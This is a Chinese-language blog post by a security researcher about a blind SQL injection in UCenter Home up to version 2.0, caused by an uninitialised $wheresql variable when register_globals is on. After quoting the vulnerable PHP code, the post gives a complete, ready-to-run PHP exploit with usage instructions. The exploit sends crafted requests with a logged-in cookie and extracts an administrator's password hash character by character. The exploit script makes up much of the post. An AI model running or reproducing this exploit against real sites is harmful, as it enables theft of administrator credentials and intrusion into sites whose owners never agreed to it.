UCenter_Home橫跨三個版本的雞肋注入

這個注入從1.2版本就存在，08年末在大家廣泛使用1.5版本的時候要搞個uchome的站，於是看了下源碼找到這個點，寫了個沒用的exp藏一年多了一直丟硬盤沒發，前幾天看了下2.0版本看到依舊存在，還跟flyh4t說要不要公佈呢。既然xhming公佈了，我也說下吧。估計很多大牛也做爲後備0day雪藏很久了吧。

首先說雞肋，兩個原因導致：
1是漏洞的存在必須開啓全局變量，即register_globals爲on；
2是基於ucenter本身產品的安全性，即使注入得到密碼，又有幾個能破的了的。

然後說漏洞，其實很容易就可以看到：

if($space['friendnum']) { //必須有好友，才能觸發
        $groups = getfriendgroup();

        $theurl = 'cp.php?ac=friend&op=group';
        $group = !isset($_GET['group'])?'-1':intval($_GET['group']);
        if($group > -1) {//條件可以控制且無需控制
            $wheresql = "AND main.gid='$group'";//$wheresql 沒有初始化
            $theurl .= "&group=$group";
        }

        $count = $_SGLOBAL['db']->result($_SGLOBAL['db']->query("SELECT COUNT(*) FROM ".tname('friend')." main
            WHERE main.uid='$space[uid]' AND main.status='1' $wheresql"), 0);
        $query = $_SGLOBAL['db']->query("SELECT main.fuid AS uid,main.fusername AS username, main.gid, main.num FROM ".tname('friend')." main
            WHERE main.uid='$space[uid]' AND main.status='1' $wheresql
            ORDER BY main.dateline DESC
            LIMIT $start,$perpage");
        while ($value = $_SGLOBAL['db']->fetch_array($query)) {
            realname_set($value['uid'], $value['username']);
            $value['group'] = $groups[$value['gid']];
            $list[] = $value;
        }
        $multi = multi($count, $perpage, $page, $theurl);
    }
類似於去年ECShop暴出的那個注射漏洞，而且利用條件也一樣，需要works with register_globals = On。

無語的是，升級版本的時候程序員居然沒有發現~

開啓全局下利用：

1.註冊號登錄加好友，必須存在好友；

2.由於兩個SQL都調用了，union select注不方便，可以直接盲注，丟個簡單的exp：

傻傻問下：注入到密碼有啥用:)

<?
print_r('
--------------------------------------------------------------------------------
UChome <=2.0 "wheresql" blind SQL injection/admin credentials disclosure exploit
BY oldjun
--------------------------------------------------------------------------------
');

if ($argc<4) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to UChome
uid: uid to UChome
Example:
php '.$argv[0].' localhost / 1
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global  $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$uid=$argv[3];
$prefix="cdb_uc_";
$cookie="cdb_sid=UR4dP4; uchome_loginuser=oldjun; uchome_sendmail=1; uchome_auth=2fea%2FFzIOg1fohrxPmoRl9pazueVlMxlY2D%2BT%2BmKUt9fAGyBWuXRk8iq9SbNCM9zQ9rfrnW%2FJ%2BBaq%2BkxpMkp; uchome_synfriend=1; uchome_checkpm=1";//need modify

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}

/*need login*/
$packet ="GET ".$path."cp.php?ac=friend&op=group HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi(chr(196).chr(250).chr(208).chr(232).chr(210).chr(170).chr(207).chr(200).chr(181).chr(199).chr(194).chr(188),$html))
{
die("Login first!");
}

echo "[~]exploting now,plz waiting\r\n";

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$packet ="GET ".$path."cp.php?ac=friend&op=group&wheresql=/**/and/**/1=(select/**/count(*)/**/from/**/".$prefix."members/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/uid=".$uid.") HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//die($html);
if (!eregi(chr(195).chr(187).chr(211).chr(208).chr(207).chr(224).chr(185).chr(216).chr(211).chr(195).chr(187).chr(167),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

print_r('
--------------------------------------------------------------------------------
[+]pwd(md5 32位) -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>